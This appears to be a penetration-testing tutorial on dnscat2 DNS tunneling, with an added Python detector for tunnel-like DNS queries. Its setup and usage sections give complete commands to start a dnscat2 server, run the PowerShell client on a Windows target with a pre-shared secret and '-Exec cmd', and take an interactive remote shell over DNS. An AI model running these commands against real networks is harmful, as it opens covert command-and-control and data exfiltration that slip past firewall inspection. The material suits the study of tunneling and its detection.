DNS Tunneling with Dnscat2

Dnscat2 is a tunneling tool that uses the DNS protocol to send data between two hosts. It provides an encrypted Command-and-Control (C2) channel and carries its data inside TXT records within ordinary DNS queries and responses.

How It Works

In a typical corporate Active Directory environment, a local DNS server resolves hostnames to IP addresses and forwards queries it cannot answer itself to external DNS servers. dnscat2 abuses this path: the client requests resolution of names under a domain whose authoritative server is controlled by the attacker. When the local DNS server forwards those lookups, the data leaves the network wrapped in what looks like normal DNS resolution rather than as a legitimate DNS request.

This makes dnscat2 a very stealthy approach to data exfiltration, because it bypasses firewall detections that intercept (strip) HTTPS connections and inspect the traffic; those inspections do not see the DNS queries that carry the tunnel.
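Seen from the defensive side, the traffic pattern described above is what gives the tunnel away: every dnscat2 query is a TXT lookup (dnscat2 can also use CNAME and MX) whose subdomain labels are long and high-entropy, all under one base domain, repeated rapidly by a single client. The following added example, which is not part of the original post or of dnscat2 itself, scores constructed DNS query log lines on exactly those features; the log format, thresholds and sample names are assumptions.

```python
import math
from collections import Counter, defaultdict

# Constructed sample log lines "<time> <client> <qtype> <qname>" (not real captures).
# The TXT queries under inlanefreight.local mimic a dnscat2 session, whose payload
# shows up as long hex labels; the other lines are ordinary lookups.
SAMPLE_LOG = """\
10:00:01 10.10.10.5 A www.example.com
10:00:02 10.10.10.5 TXT 4e1f7c2a9b3d8e5f0a6c1b7d2e9f4a3c.8b5d0e7f2a9c4b1d6e3f8a5c0b7d2e9f.inlanefreight.local
10:00:02 10.10.10.5 TXT 9d3a5f1c7e2b8a4d0f6c3e9b5a1d7f2c.1c8e4a0b6d2f9e5a3b7c1d8f4e0a6b2d.inlanefreight.local
10:00:03 10.10.10.7 A mail.example.com
10:00:03 10.10.10.5 TXT 2f7b1e9c4a8d3f0e6b2c5a9d1f7e3b8c.6a0d4f8b2e7c1a5d9f3b6e0c4a8d2f7b.inlanefreight.local
10:00:04 10.10.10.7 TXT _dmarc.example.com
"""

MAX_LABEL_LEN = 20                      # assumed: normal hostnames rarely exceed this
MIN_ENTROPY = 3.0                       # bits/char; encoded payloads approach 4.0 for hex
TUNNEL_QTYPES = {"TXT", "CNAME", "MX"}  # TXT as on this page; dnscat2 also supports CNAME/MX
MIN_QUERIES = 3                         # assumed burst size per (client, base domain)


def shannon_entropy(s):
    """Shannon entropy of s in bits per character (0.0 for an empty or uniform string)."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def split_name(qname):
    """Return (subdomain labels, base domain) for a query name like a.b.example.com."""
    labels = qname.rstrip(".").split(".")
    return labels[:-2], ".".join(labels[-2:])


def is_suspicious_query(qtype, qname):
    """True when one query has the shape of a DNS tunnel: data-carrying type + long random labels."""
    sub, _ = split_name(qname)
    if qtype not in TUNNEL_QTYPES or not sub:
        return False
    longest = max(len(label) for label in sub)
    return longest > MAX_LABEL_LEN and shannon_entropy("".join(sub)) >= MIN_ENTROPY


def find_tunnels(log_text):
    """Count suspicious queries per (client, base domain) and return the bursts worth alerting on."""
    hits = defaultdict(int)
    for line in log_text.splitlines():
        _, client, qtype, qname = line.split()
        if is_suspicious_query(qtype, qname):
            hits[(client, split_name(qname)[1])] += 1
    return {key: count for key, count in hits.items() if count >= MIN_QUERIES}
```

On real resolver logs the thresholds need tuning against the environment's baseline, and legitimate services that issue long TXT lookups (e.g. some anti-spam or CDN checks) should be allow-listed by base domain.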

Setup

Server (Attack Host)

Clone and install dnscat2:

git clone https://github.com/iagox86/dnscat2.git
cd dnscat2/server/
sudo gem install bundler
sudo bundle install

Start the dnscat2 server:

sudo ruby dnscat2.rb --dns host=10.10.14.18,port=53,domain=inlanefreight.local --no-cache

The server prints the pre-shared secret needed to authenticate and encrypt client connections, together with the client command that uses it:

./dnscat --secret=0ec04a91cd1e963f8c03ca499d589d21 inlanefreight.local

Client (Target Host)

For Windows targets, use the dnscat2-powershell client.

Clone it on the attack host, then transfer dnscat2.ps1 to the target:

git clone https://github.com/lukebaggett/dnscat2-powershell.git

On the target, import and run the client:

Import-Module .\dnscat2.ps1
Start-Dnscat2 -DNSserver 10.10.14.18 -Domain inlanefreight.local -PreSharedSecret 0ec04a91cd1e963f8c03ca499d589d21 -Exec cmd

The -PreSharedSecret value must match the secret generated by the server; otherwise no encrypted session can be established.

Usage

Once a session is established, the server will confirm:

Session 1 Security: ENCRYPTED AND VERIFIED!

Available Commands

dnscat2> ?
* echo
* help
* kill
* quit
* set
* start
* stop
* tunnels
* unset
* window
* windows

Interacting with a Session

dnscat2> window -i 1

This drops into the established session, giving you an interactive shell on the target. Press Ctrl-Z to return to the dnscat2 prompt without closing the session.